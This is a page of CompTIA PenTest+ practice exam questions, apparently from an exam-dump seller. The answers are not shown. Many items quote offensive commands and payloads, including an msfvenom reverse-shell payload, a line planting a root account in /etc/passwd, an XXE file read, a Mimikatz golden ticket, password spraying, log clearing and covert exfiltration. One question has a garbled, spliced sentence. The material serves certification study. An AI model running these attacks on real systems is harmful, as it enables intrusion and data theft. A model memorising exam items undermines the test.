Summer Sale - 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: dm70dm

PT0-003 CompTIA PenTest+ Exam Questions and Answers

Questions 4

A penetration tester is performing a security review of a web application. Which of the following should the tester leverage to identify the presence of vulnerable open-source libraries?

Options:

A.

VM

B.

IAST

C.

DAST

D.

SCA

Buy Now
Questions 5

An external legal firm is conducting a penetration test of a large corporation. Which of the following would be most appropriate for the legal firm to use in the subject line of a weekly email update?

Options:

A.

Privileged & Confidential Status Update

B.

Action Required Status Update

C.

Important Weekly Status Update

D.

Urgent Status Update

Buy Now
Questions 6

During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence. Which of the following is the best way for the penetration tester to hide the activities performed?

Options:

A.

Clear the Windows event logs.

B.

Modify the system time.

C.

Alter the log permissions.

D.

Reduce the log retention settings.

Buy Now
Questions 7

A penetration tester obtains the following output during an Nmap scan:

PORT STATE SERVICE

135/tcp open msrpc

445/tcp open microsoft-ds

1801/tcp open msmq

2103/tcp open msrpc

3389/tcp open ms-wbt-server

Which of the following should be the next step for the tester?

Options:

A.

Search for vulnerabilities on msrpc.

B.

Enumerate shares and search for vulnerabilities on the SMB service.

C.

Execute a brute-force attack against the Remote Desktop Services.

D.

Execute a new Nmap command to search for another port.

Buy Now
Questions 8

A penetration tester creates the following Python script that can be used to enumerate information about email accounts on a target mail server:

PT0-003 Question 8

Which of the following logic constructs would permit the script to continue despite failure?

Options:

A.

Add a do/while loop.

B.

Add an iterator.

C.

Add a t.ry/except. block.

D.

Add an if/else conditional.

Buy Now
Questions 9

In a file stored in an unprotected source code repository, a penetration tester discovers the following line of code:

sshpass -p donotchange ssh admin@192.168.6.14

Which of the following should the tester attempt to do next to take advantage of this information? (Select two).

Options:

A.

Use Nmap to identify all the SSH systems active on the network.

B.

Take a screen capture of the source code repository for documentation purposes.

C.

Investigate to find whether other files containing embedded passwords are in the code repository.

D.

Confirm whether the server 192.168.6.14 is up by sending ICMP probes.

E.

Run a password-spraying attack with Hydra against all the SSH servers.

F.

Use an external exploit through Metasploit to compromise host 192.168.6.14.

Buy Now
Questions 10

openssl passwd password

$1$OjxLvZ85$Fdr51vn/Z4zXWsQR/Xrj.

The tester then adds the following line to the world-writable script:

echo ' root2:$1$0jxLvZ85$Fdr51vn/Z4zXWsQR/Xrj .: 1001:1001:,,,:/root:/bin/bash " > > /etc/passwd

Which of the following should the penetration tester do to enable this exploit to work correctly?

Options:

A.

Use only a single redirect to /etc/password.

B.

Generate the password using md5sum.

C.

Log in to the host using SSH.

D.

Change the 1001 entries to 0.

Buy Now
Questions 11

A penetration tester attempts to obtain the preshared key for a client ' s wireless network. Which of the following actions will most likely aid the tester?

Options:

A.

Deploying an evil twin with a WiFi Pineapple

B.

Performing a password spraying attack with Hydra

C.

Setting up a captive portal using SET

D.

Deauthenticating clients using aireplay-ng

Buy Now
Questions 12

A penetration tester uses the Intruder tool from the Burp Suite Community Edition while assessing a web application. The tester notices the test is taking too long to complete. Which of the following tools can the tester use to accelerate the test and achieve similar results?

Options:

A.

TruffleHog

B.

Postman

C.

Wfuzz

D.

WPScan

Buy Now
Questions 13

During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward. Which of the following types of attacks is this an example of?

Options:

A.

SQL injection

B.

SSRF

C.

XSS

D.

Server-side template injection

Buy Now
Questions 14

During an assessment on a client that uses virtual desktop infrastructure in the cloud, a penetration tester gains access to a host and runs commands. The penetration tester receives the following output:

-rw-r--r-- 1 comptiauser comptiauser 807 Apr 6 05:32 .profile

drwxr-xr-x 2 comptiauser comptiauser 4096 Apr 6 05:32 .ssh

-rw-r--r-- 1 comptiauser comptiauser 3526 Apr 6 05:32 .bashrc

drwxr-xr-x 4 comptiauser comptiauser 4096 May 12 11:05 .aws

-rw-r--r-- 1 comptiauser comptiauser 1325 Aug 21 19:54 .zsh_history

drwxr-xr-x 12 comptiauser comptiauser 4096 Aug 27 14:10 Documents

drwxr-xr-x 16 comptiauser comptiauser 4096 Aug 27 14:10 Desktop

drwxr-xr-x 2 comptiauser comptiauser 4096 Aug 27 14:10 Downloads

Which of the following should the penetration tester investigate first?

Options:

A.

Documents

B.

.zsh_history

C.

.aws

D.

.ssh

Buy Now
Questions 15

During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command:

findstr /SIM /C: " pass " *.txt *.cfg *.xml

Which of the following is the penetration tester trying to enumerate?

Options:

A.

Configuration files

B.

Permissions

C.

Virtual hosts

D.

Secrets

Buy Now
Questions 16

A penetration tester wants to verify whether passwords from a leaked password list can be used to access an SSH server as a legitimate user. Which of the following is the most appropriate tool for this task?

Options:

A.

BloodHound

B.

Responder

C.

Burp Suite

D.

Hydra

Buy Now
Questions 17

A penetration tester is getting ready to conduct a vulnerability scan as part of the testing process. The tester will evaluate an environment that consists of a container orchestration cluster. Which of the following tools should the tester use to evaluate the cluster?

Options:

A.

Trivy

B.

Nessus

C.

Grype

D.

Kube-hunter

Buy Now
Questions 18

A penetration tester cannot complete a full vulnerability scan because the client ' s WAF is blocking communications. During which of the following activities should the penetration tester discuss this issue with the client?

Options:

A.

Goal reprioritization

B.

Peer review

C.

Client acceptance

D.

Stakeholder alignment

Buy Now
Questions 19

A penetration tester cannot find information on the target company ' s systems using common OSINT methods. The tester ' s attempts to do reconnaissance against internet-facing resources have been blocked by the company ' s WAF. Which of the following is the best way to avoid the WAF and gather information about the target company ' s systems?

Options:

A.

HTML scraping

B.

Code repository scanning

C.

Directory enumeration

D.

Port scanning

Buy Now
Questions 20

Given the following statements:

Implement a web application firewall.

Upgrade end-of-life operating systems.

Implement a secure software development life cycle.

In which of the following sections of a penetration test report would the above statements be found?

Options:

A.

Executive summary

B.

Attack narrative

C.

Detailed findings

D.

Recommendations

Buy Now
Questions 21

A penetration tester presents the following findings to stakeholders:

Control | Number of findings | Risk | Notes

Encryption | 1 | Low | Weak algorithm noted

Patching | 8 | Medium | Unsupported systems

System hardening | 2 | Low | Baseline drift observed

Secure SDLC | 10 | High | Libraries have vulnerabilities

Password policy | 0 | Low | No exceptions noted

Based on the findings, which of the following recommendations should the tester make? (Select two).

Options:

A.

Develop a secure encryption algorithm.

B.

Deploy an asset management system.

C.

Write an SDLC policy.

D.

Implement an SCA tool.

E.

Obtain the latest library version.

F.

Patch the libraries.

Buy Now
Questions 22

The following file was obtained during reconnaissance:

PT0-003 Question 22

Which of the following is most likely to be successful if a penetration tester achieves non-privileged user access?

Options:

A.

Exposure of other users ' sensitive data

B.

Unauthorized access to execute binaries via sudo

C.

Hijacking the default user login shells

D.

Corrupting the skeleton configuration file

Buy Now
Questions 23

A penetration tester identifies multiple connections to public LLMs. The client’s IT team has not authorized the use of all of these LLMs. Which of the following best describes the risk to the client?

Options:

A.

Accidental loss of internal data

B.

Public disclosure of intellectual property

C.

Exfiltration of employee credentials

D.

Prompt injection vulnerability

Buy Now
Questions 24

A company hires a penetration tester to test the security of its wireless networks. The main goal is to intercept and access sensitive data.

Which of the following tools should the security professional use to best accomplish this task?

Options:

A.

Metasploit

B.

WiFi-Pumpkin

C.

SET

D.

theHarvester

E.

WiGLE.net

Buy Now
Questions 25

A penetration tester gains access to a Windows machine and wants to further enumerate users with native operating system credentials. Which of the following should the tester use?

Options:

A.

route.exe print

B.

netstat.exe -ntp

C.

net.exe commands

D.

strings.exe -a

Buy Now
Questions 26

A client warns the assessment team that an ICS application is maintained by the manufacturer. Any tampering of the host could void the enterprise support terms of use. Which of the following techniques would be most effective to validate whether the application encrypts communications in transit?

Options:

A.

Utilizing port mirroring on a firewall appliance

B.

Installing packet capture software on the server

C.

Reconfiguring the application to use a proxy

D.

Requesting that certificate pinning be disabled

Buy Now
Questions 27

A penetration tester has adversely affected a critical system during an engagement, which could have a material impact on the organization. Which of the following should the penetration tester do to address this issue?

Options:

A.

Restore the configuration.

B.

Perform a BIA.

C.

Follow the escalation process.

D.

Select the target.

Buy Now
Questions 28

During a penetration test, the tester identifies several unused services that are listening on all targeted internal laptops. Which of the following technical controls should the tester recommend to reduce the risk of compromise?

PT0-003 Question 28

Options:

A.

Multifactor authentication

B.

Patch management

C.

System hardening

D.

Network segmentation

Buy Now
Questions 29

During a penetration test, the tester uses a vulnerability scanner to collect information about any possible vulnerabilities that could be used to compromise the network. The tester receives the results and then executes the following command:

snmpwalk -v 2c -c public 192.168.1.23

Which of the following is the tester trying to do based on the command they used?

Options:

A.

Bypass defensive systems to collect more information.

B.

Use an automation tool to perform the attacks.

C.

Script exploits to gain access to the systems and host.

D.

Validate the results and remove false positives.

Buy Now
Questions 30

A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client’s networking team observes a substantial increase in DNS traffic. Which of the following would most likely explain the increase in DNS traffic?

Options:

A.

Covert data exfiltration

B.

URL spidering

C.

HTML scraping

D.

DoS attack

Buy Now
Questions 31

A tester needs to begin capturing WLAN credentials for cracking during an on-site engagement. Which of the following is the best command to capture handshakes?

Options:

A.

tcpdump -n -s0 -w < pcapname > -i < iface >

B.

airserv-ng -d < iface >

C.

aireplay-ng -0 1000 -a < target_mac >

D.

airodump-ng -c 6 --bssid < target_mac > < iface >

Buy Now
Questions 32

A penetration tester writes the following script to enumerate a /24 network:

1 #!/bin/bash

2 for i in {1..254}

3 ping -c1 192.168.1.$i

4 done

The tester executes the script, but it fails with the following error:

-bash: syntax error near unexpected token ' ping '

Which of the following should the tester do to fix the error?

Options:

A.

Add do after line 2

B.

Replace {1..254} with $(seq 1 254)

C.

Replace bash with zsh

D.

Replace $i with ${i}

Buy Now
Questions 33

A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output:

Hostname | IP address | CVSS 2.0 | EPSS

hrdatabase | 192.168.20.55 | 9.9 | 0.50

financesite | 192.168.15.99 | 8.0 | 0.01

legaldatabase | 192.168.10.2 | 8.2 | 0.60

fileserver | 192.168.125.7 | 7.6 | 0.90

Which of the following targets should the tester select next?

Options:

A.

fileserver

B.

hrdatabase

C.

legaldatabase

D.

financesite

Buy Now
Questions 34

A penetration tester is conducting an assessment of a web application ' s login page. The tester needs to determine whether there are any hidden form fields of interest. Which of the following is the most effective technique?

Options:

A.

XSS

B.

On-path attack

C.

SQL injection

D.

HTML scraping

Buy Now
Questions 35

A company that uses an insecure corporate wireless network is concerned about security. Which of the following is the most likely tool a penetration tester could use to obtain initial access?

Options:

A.

Responder

B.

Metasploit

C.

Netcat

D.

Nmap

Buy Now
Questions 36

A penetration tester wants to automatically enumerate all ciphers permitted on TLS/SSL configurations across a client’s internet-facing and internal web servers. Which of the following tools or frameworks best supports this objective?

Options:

A.

Nmap Scripting Engine

B.

Shodan

C.

Impacket

D.

Netcat

E.

Burp Suite

Buy Now
Questions 37

A penetration tester is evaluating a company ' s cybersecurity preparedness. The tester wants to acquire valid credentials using a social engineering campaign. Which of the following tools and techniques are most applicable in this scenario? (Select two).

Options:

A.

TruffleHog for collecting credentials

B.

Shodan for identifying potential targets

C.

Gophish for sending phishing emails

D.

Maltego for organizing targets

E.

theHarvester for discovering additional targets

F.

Evilginx for handling legitimate authentication requests through a proxy

Buy Now
Questions 38

A penetration tester reviews scan output showing open services including FTP, SSH, SMTP, DNS, Kerberos, LDAP, HTTPS, SMB, RDP, and Squid proxy. The output also shows NetBIOS and DNS domain information. Which of the following most likely describes the function of this system?

Options:

A.

Enterprise mail server

B.

Honeypot

C.

Stand-alone web server

D.

Domain Controller

Buy Now
Questions 39

A penetration tester is conducting a wireless security assessment for a client with 2.4GHz and 5GHz access points. The tester places a wireless USB dongle in the laptop to start capturing WPA2 handshakes. Which of the following steps should the tester take next?

Options:

A.

Enable monitoring mode using Aircrack-ng.

B.

Use Kismet to automatically place the wireless dongle in monitor mode and collect handshakes.

C.

Run KARMA to break the password.

D.

Research WiGLE.net for potential nearby client access points.

Buy Now
Questions 40

During a security assessment, a penetration tester wants to compromise user accounts without triggering IDS/IPS detection rules. Which of the following is the most effective way for the tester to accomplish this task?

Options:

A.

Crack user accounts using compromised hashes.

B.

Brute force accounts using a dictionary attack.

C.

Bypass authentication using SQL injection.

D.

Compromise user accounts using an XSS attack.

Buy Now
Questions 41

A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be a function of the rules of engagement?

Options:

A.

Testing window

B.

Terms of service

C.

Authorization letter

D.

Shared responsibilities

Buy Now
Questions 42

During a security assessment, a penetration tester uses a tool to capture plaintext log-in credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access. Which of the following tools is the tester using?

Options:

A.

Burp Suite

B.

Wireshark

C.

Zed Attack Proxy

D.

Metasploit

Buy Now
Questions 43

A penetration tester conducts a scan on an exposed Linux web server and gathers the following data:

Host: 192.168.55.23

Open Ports:

22/tcp Open OpenSSH 7.2p2 Ubuntu 4ubuntu2.10

80/tcp Open Apache httpd 2.4.18 (Ubuntu)

111/tcp Open rpcbind 2-4 (RPC #100000)

Additional notes:

Directory listing enabled on /admin

Apache mod_cgi enabled

No authentication required to access /cgi-bin/debug.sh

X-Powered-By: PHP/5.6.40-0+deb8u12

Which of the following is the most effective action to take?

Options:

A.

Launch a payload using msfvenom and upload it to the /admin directory.

B.

Review the contents of /cgi-bin/debug.sh.

C.

Use Nikto to scan the host and port 80.

D.

Attempt a brute-force attack against OpenSSH 7.2p2.

Buy Now
Questions 44

A penetration tester cannot use Nmap and must perform port discovery and banner grabbing for potential vulnerable SSH services. Given the following script:

#!/usr/bin/bash

ip_address = " 192.168.5. "

...

for i in {1..254}

do

--missing command--

done

...

Which of the following commands will best help the tester achieve this objective?

Options:

A.

ping -c 22 " $ip_address$i "

B.

nc " $ip_address$i " " :22 "

C.

arp " $ip_address$i " " :22 "

D.

curl scp:// " $ip_address$i " " :22 "

Buy Now
Questions 45

Which of the following is a term used to describe a situation in which a penetration tester bypasses physical access controls and gains access to a facility by entering at the same time as an employee?

Options:

A.

Badge cloning

B.

Shoulder surfing

C.

Tailgating

D.

Site survey

Buy Now
Questions 46

During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?

Options:

A.

A collection of email addresses for the target domain that is available on multiple sources on the internet

B.

DNS records for the target domain and subdomains that could be used to increase the external attack surface

C.

Data breach information about the organization that could be used for additional enumeration

D.

Information from the target ' s main web page that collects usernames, metadata, and possible data exposures

Buy Now
Questions 47

Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?

Options:

A.

Preserving artifacts

B.

Reverting configuration changes

C.

Keeping chain of custody

D.

Exporting credential data

Buy Now
Questions 48

A penetration tester finishes a security scan and uncovers numerous vulnerabilities on several hosts. Based on the targets ' EPSS (Exploit Prediction Scoring System) and CVSS (Common Vulnerability Scoring System) scores, which of the following targets is the most likely to get attacked?

Options:

A.

Target 1: EPSS Score = 0.6, CVSS Score = 4

B.

Target 2: EPSS Score = 0.3, CVSS Score = 2

C.

Target 3: EPSS Score = 0.6, CVSS Score = 1

D.

Target 4: EPSS Score = 0.4, CVSS Score = 4.5

Buy Now
Questions 49

A penetration tester identifies the following open ports during a network enumeration scan:

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

111/tcp open rpcbind

443/tcp open https

27017/tcp open mongodb

50123/tcp open ms-rpc

Which of the following commands did the tester use to get this output?

Options:

A.

nmap -Pn -A 10.10.10.10

B.

nmap -sV 10.10.10.10

C.

nmap -Pn -w 10.10.10.10

D.

nmap -sV -Pn -p- 10.10.10.10

Buy Now
Questions 50

A penetration tester must identify vulnerabilities within an ICS (Industrial Control System) that is not connected to the internet or enterprise network. Which of the following should the tester utilize to conduct the testing?

Options:

A.

Channel scanning

B.

Stealth scans

C.

Source code analysis

D.

Manual assessment

Buy Now
Questions 51

While performing an internal assessment, a tester uses the following command:

crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@

Which of the following is the main purpose of the command?

Options:

A.

To perform a pass-the-hash attack over multiple endpoints within the internal network

B.

To perform common protocol scanning within the internal network

C.

To perform password spraying on internal systems

D.

To execute a command in multiple endpoints at the same time

Buy Now
Questions 52

A penetration tester writes the following script to enumerate a 1724 network:

1 #!/bin/bash

2 for i in {1..254}; do

3 ping -c1 192.168.1.$i

4 done

The tester executes the script, but it fails with the following error:

-bash: syntax error near unexpected token `ping '

Which of the following should the tester do to fix the error?

Options:

A.

Add do after line 2.

B.

Replace {1..254} with $(seq 1 254).

C.

Replace bash with tsh.

D.

Replace $i with ${i}.

Buy Now
Questions 53

Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?

Options:

A.

FTP

B.

HTTPS

C.

SMTP

D.

DNS

Buy Now
Questions 54

During an assessment, a penetration tester runs the following command:

dnscmd.exe /config /serverlevelplugindll C:\users\necad-TA\Documents\adduser.dll

Which of the following is the penetration tester trying to achieve?

Options:

A.

DNS enumeration

B.

Privilege escalation

C.

Command injection

D.

A list of available users

Buy Now
Questions 55

A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts. The executive report outlines the following information:

Server High-severity vulnerabilities

1. Development sandbox server 32

2. Back office file transfer server 51

3. Perimeter network web server 14

4. Developer QA server 92

The client is con ble monitoring mode using Aircrack-ng ch of the following hosts should the penetration tester select for additional manual testing?

Options:

A.

Server 1

B.

Server 2

C.

Server 3

D.

Server 4

Buy Now
Questions 56

A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent:

< ?xml version= " 1.0 " ? >

< !DOCTYPE data [ < !ENTITY foo SYSTEM " file:///etc/passwd " > ] >

< test > & foo; < /test >

Which of the following should the tester recommend in the report to best prevent this type of vulnerability?

Options:

A.

Drop all excessive file permissions with chmod o-rwx

B.

Ensure the requests application access logs are reviewed frequently

C.

Disable the use of external entities

D.

Implement a WAF to filter all incoming requests

Buy Now
Questions 57

With one day left to complete the testing phase of an engagement, a penetration tester obtains the following results from an Nmap scan:

Not shown: 1670 closed ports

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.2.3 (CentOS)

3306/tcp open mysql MySQL (unauthorized)

8888/tcp open http lighttpd 1.4.32

Which of the following tools should the tester use to quickly identify a potential attack path?

Options:

A.

msfvenom

B.

SearchSploit

C.

sqlmap

D.

BeEF

Buy Now
Questions 58

A penetration tester receives the following output when enumerating a local user:

User compromised_user may run the following commands on localhost:

root (NO PASSWD): /bin/vim

The tester suspects that another host on the same subnet is also vulnerable. Which of the following is the best method to validate whether the other host is vulnerable?

Options:

A.

ssh compromised_user@victimhost " vim; echo $? "

B.

ssh compromised_user@victimhost " sudo -l "

C.

ssh compromised_user@victimhost " bash -c vim "

D.

ssh compromised_user@victimhost " ls -lah /bin/vim "

Buy Now
Questions 59

Which of the following could be used to enhance the quality and reliability of a vulnerability scan report?

Options:

A.

Risk analysis

B.

Peer review

C.

Root cause analysis

D.

Client acceptance

Buy Now
Questions 60

During an internal penetration test, a tester compromises a Windows OS-based endpoint and bypasses the defensive mechanisms. The tester also discovers that the endpoint is part of an Active Directory (AD) local domain.

The tester’s main goal is to leverage credentials to authenticate into other systems within the Active Directory environment.

Which of the following steps should the tester take to complete the goal?

Options:

A.

Use Mimikatz to collect information about the accounts and try to authenticate in other systems

B.

Use Hashcat to crack a password for the local user on the compromised endpoint

C.

Use Evil-WinRM to access other systems in the network within the endpoint credentials

D.

Use Metasploit to create and execute a payload and try to upload the payload into other systems

Buy Now
Questions 61

A penetration tester is conducting reconnaissance on a target network. The tester runs the following Nmap command: nmap -sv -sT -p - 192.168.1.0/24. Which of the following describes the most likely purpose of this scan?

Options:

A.

OS fingerprinting

B.

Attack path mapping

C.

Service discovery

D.

User enumeration

Buy Now
Questions 62

A penetration tester is trying to execute a post-exploitation activity and creates the follow script:

PT0-003 Question 62

Which of the following best describes the tester ' s objective?

Options:

A.

To download data from an API endpoint

B.

To download data from a cloud storage

C.

To exfiltrate data over alternate data streams

D.

To exfiltrate data to cloud storage

Buy Now
Questions 63

A penetration tester needs to complete cleanup activities from the testing lead. Which of the following should the tester do to validate that reverse shell payloads are no longer running?

Options:

A.

Run scripts to terminate the implant on affected hosts.

B.

Spin down the C2 listeners.

C.

Restore the firewall settings of the original affected hosts.

D.

Exit from C2 listener active sessions.

Buy Now
Questions 64

A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp

The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?

Options:

A.

regsvr32 /s /n /u C:\evil.xml

B.

MSBuild.exe C:\evil.xml

C.

mshta.exe C:\evil.xml

D.

AppInstaller.exe C:\evil.xml

Buy Now
Questions 65

A tester conducts a web application penetration test and discovers a hidden diagnostics page. The hidden diagnostics page allows a user to ping other systems and test connectivity. Which of the following payloads is best suited to test this function?

Options:

A.

; whoami ; ps aux

B.

< script > alert(1) < /script >

C.

' SELECT @@version --

D.

../../../../../../etc/passwd

Buy Now
Questions 66

A penetration tester obtains a regular domain user ' s set of credentials. The tester wants to attempt a dictionary attack by creating a custom word list based on the Active Directory password policy. Which of the following tools should the penetration tester use to retrieve the password policy?

Options:

A.

Responder

B.

CrackMapExec

C.

Hydra

D.

msfvenom

Buy Now
Questions 67

During a testing engagement, a penetration tester compromises a host and locates data for exfiltration. Which of the following are the best options to move the data without triggering a data loss prevention tool? (Select two).

Options:

A.

Move the data using a USB flash drive.

B.

Compress and encrypt the data.

C.

Rename the file name extensions.

D.

Use FTP for exfiltration.

E.

Encode the data as Base64.

F.

Send the data to a commonly trusted service.

Buy Now
Questions 68

A penetration tester gains access to a host but does not have access to any type of shell. Which of the following is the best way for the tester to further enumerate the host and the environment in which it resides?

Options:

A.

ProxyChains

B.

Netcat

C.

PowerShell ISE

D.

Process IDs

Buy Now
Questions 69

A penetration tester observes the following output from an Nmap command while attempting to troubleshoot connectivity to a Linux server:

Starting Nmap 7.91 ( https://nmap.org ) at 2024-01-10 12:00 UTC

Nmap scan report for example.com (192.168.1.10)

Host is up (0.001s latency).

Not shown: 9999 closed ports

PORT STATE SERVICE

21/tcp open ftp

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

2222/tcp open ssh

444/tcp open microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

Which of the following is the most likely reason for the connectivity issue?

Options:

A.

The SSH service is running on a different port.

B.

The SSH service is blocked by a firewall.

C.

The SSH service requires certificate authentication.

D.

The SSH service is not active.

Buy Now
Questions 70

Which of the following scenarios would most likely lead a client to reprioritize goals after a penetration test begins?

Options:

A.

An end-of-life web server is decommissioned.

B.

A new zero-day vulnerability is publicly disclosed.

C.

The penetration tester is not capturing artifacts for an exploited vulnerability.

D.

A new lead penetration tester is assigned to the project.

Buy Now
Questions 71

During an assessment, a penetration tester plans to gather metadata from various online files, including pictures. Which of the following standards outlines the formats for pictures, audio, and additional tags that facilitate this type of reconnaissance?

Options:

A.

EXIF

B.

GIF

C.

COFF

D.

ELF

Buy Now
Questions 72

A penetration tester finishes an initial discovery scan for hosts on a /24 customer subnet. The customer states that the production network is composed of Windows servers but no container clusters. The following are the last several lines from the scan log:

Line 1: 112 hosts found... trying ports

Line 2: FOUND 22 with OpenSSH 1.2p2 open on 99 hosts

Line 3: FOUND 161 with UNKNOWN banner open on 110 hosts

Line 4: TCP RST received on ports 21, 3389, 80

Line 5: Scan complete.

Which of the following is the most likely reason for the results?

Options:

A.

Multiple honeypots were encountered

B.

The wrong subnet was scanned

C.

Windows is using WSL

D.

IPS is blocking the ports

Buy Now
Questions 73

Which of the following can an access control vestibule help deter?

Options:

A.

USB drops

B.

Badge cloning

C.

Lock picking

D.

Tailgating

Buy Now
Questions 74

A penetration tester needs to test a very large number of URLs for public access. Given the following code snippet:

1 import requests

2 import pathlib

3

4 for url in pathlib.Path( " urls.txt " ).read_text().split( " \n " ):

5 response = requests.get(url)

6 if response.status == 401:

7 print( " URL accessible " )

Which of the following changes is required?

Options:

A.

The condition on line 6

B.

The method on line 5

C.

The import on line 1

D.

The delimiter in line 3

Buy Now
Questions 75

After obtaining a reverse shell, a penetration tester identifies a locally cloned Git repository that contains thousands of files and directories on a Windows machine. The tester suspects there could be sensitive information related to “ProjectX.” Which of the following commands should the tester use in a script to identify potential files to produce the best results?

Options:

A.

gc * | select " ProjectX "

B.

dir /R | findstr " ProjectX "

C.

Get-ChildItem * | Select-String " ProjectX "

D.

gci -Path . -Recurse | Select-String -Pattern " ProjectX "

Buy Now
Questions 76

A penetration tester is evaluating a company’s cybersecurity preparedness. The tester wants to acquire valid credentials using a social engineering campaign. Which of the following tools and techniques are most applicable in this scenario? Select two.

Options:

A.

TruffleHog for collecting credentials

B.

Shodan for identifying potential targets

C.

Gophish for sending phishing emails

D.

Maltego for organizing targets

E.

theHarvester for discovering additional targets

F.

Evilginx for handling legitimate authentication requests through a proxy

Buy Now
Questions 77

A tester is finishing an engagement and needs to ensure that artifacts resulting from the test are safely handled. Which of the following is the best procedure for maintaining client data privacy?

Options:

A.

Remove configuration changes and any tools deployed to compromised systems.

B.

Securely destroy or remove all engagement-related data from testing systems.

C.

Search through configuration files changed for sensitive credentials and remove them.

D.

Shut down C2 and attacker infrastructure on premises and in the cloud.

Buy Now
Questions 78

During an internal penetration test, the tester uses the following command:

C:\ Invoke-mimikatz.ps1 " kerberos::golden /domain:test.local /sid:S-1-5-21-3234... /target: dc01.test.local /service:CIFS /RC4:237749d82... /user:support.test.local /ptt "

Which of the following best describes the tester’s goal when executing this command?

Options:

A.

Bypassing normal authentication

B.

Enumerating shares

C.

Obtaining current user credentials

D.

Using password spraying

Buy Now
Questions 79

A penetration tester compromises a developer’s workstation and believes the individual may have access to Amazon cloud compute resources. Which of the following commands is least likely to trigger SOC detections to confirm access?

Options:

A.

aws sts get-caller-identity

B.

aws connect describe-user

C.

aws ec2 describe-instances --dry-run

D.

aws cloud9 list-environments --max-items 1

Buy Now
Questions 80

A company wants to perform a BAS (Breach and Attack Simu-lation) to measure the efficiency of the corporate security controls. Which of the following would most likely help the tester with simple command examples?

Options:

A.

Infection Monkey

B.

Exploit-DB

C.

Atomic Red Team

D.

Mimikatz

Buy Now
Questions 81

Which of the following techniques is the best way to avoid detection by data loss prevention tools?

Options:

A.

Encoding

B.

Compression

C.

Encryption

D.

Obfuscation

Buy Now
Questions 82

Which of the following is the most likely LOLBin to be used to perform an exfiltration on a Microsoft Windows environment?

Options:

A.

procdump.exe

B.

msbuild.exe

C.

bitsadmin.exe

D.

cscript.exe

Buy Now
Questions 83

During an assessment, a penetration tester obtains access to a Microsoft SQL server using sqlmap and runs the following command:

sql > xp_cmdshell whoami /all

Which of the following is the tester trying to do?

Options:

A.

List database tables

B.

Show logged-in database users

C.

Enumerate privileges

D.

Display available SQL commands

Buy Now
Questions 84

While performing a penetration test, a tester executes the following command:

PS c:\tools > c:\hacks\PsExec.exe \\server01.cor.ptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Options:

A.

Test connectivity using PsExec on the server01 using cmd.exe

B.

Perform a lateral movement attack using PsExec

C.

Send the PsExec binary file to the server01 using cmd.exe

D.

Enable cmd.exe on the server01 through PsExec

Buy Now
Questions 85

While performing a penetration testing exercise, a tester executes the following command:

bash

Copy code

PS c:\tools > c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Options:

A.

Test connectivity using PSExec on the server01 using CMD.exe.

B.

Perform a lateral movement attack using PsExec.

C.

Send the PsExec binary file to the server01 using CMD.exe.

D.

Enable CMD.exe on the server01 through PsExec.

Buy Now
Questions 86

While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system. Which of the following is most likely responsible for this observation?

Options:

A.

Configuration changes were not reverted.

B.

A full backup restoration is required for the server.

C.

The penetration test was not completed on time.

D.

The penetration tester was locked out of the system.

Buy Now
Questions 87

Which of the following OT protocols sends information in cleartext?

Options:

A.

TTEthernet

B.

DNP3

C.

Modbus

D.

PROFINET

Buy Now
Questions 88

A penetration tester wants to send a specific network packet with custom flags and sequence numbers to a vulnerable target. Which of the following should the tester use?

Options:

A.

tcprelay

B.

Bluecrack

C.

Scapy

D.

tcpdump

Buy Now
Questions 89

During an assessment, a penetration tester runs the following command from a Linux machine:

GetUsersSPNs.py -dc-ip 172.16.1.1 DOMAIN.LOCAL/aholliday -request

Which of the following is the penetration tester trying to do?

Options:

A.

Crack the user password for aholliday

B.

Download all TGS tickets for offline processing

C.

Perform a pass-the-hash attack using the hash for aholliday

D.

Perform password spraying

Buy Now
Questions 90

A penetration tester is trying to get unauthorized access to a web application and executes the following command:

GET /foo/images/file?id=2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

Which of the following web application attacks is the tester performing?

Options:

A.

Insecure Direct Object Reference

B.

Cross-Site Request Forgery

C.

Directory Traversal

D.

Local File Inclusion

Buy Now
Questions 91

A penetration tester wants to bypass multi-factor authentication by intercepting traffic between the client and a web server. Which of the following is the most appropriate tool for this task?

Options:

A.

Gophish

B.

Recon-ng

C.

BeEF

D.

Evilginx

E.

Yersinia

Buy Now
Questions 92

During an assessment of a company, a penetration tester sends the following email to the company’s Chief Financial Officer (CFO):

Dear CFO,

As we talked about during a recent meeting, please open the following attachment that contains the invoice for an existing vendor. If you do not pay this now, we will suspend the licenses for your billing system in three days.

GoPay CMS Systems Services

Which of the following techniques is this attack an example of?

Options:

A.

Whaling

B.

Phishing

C.

Spear phishing

D.

Vishing

Buy Now
Questions 93

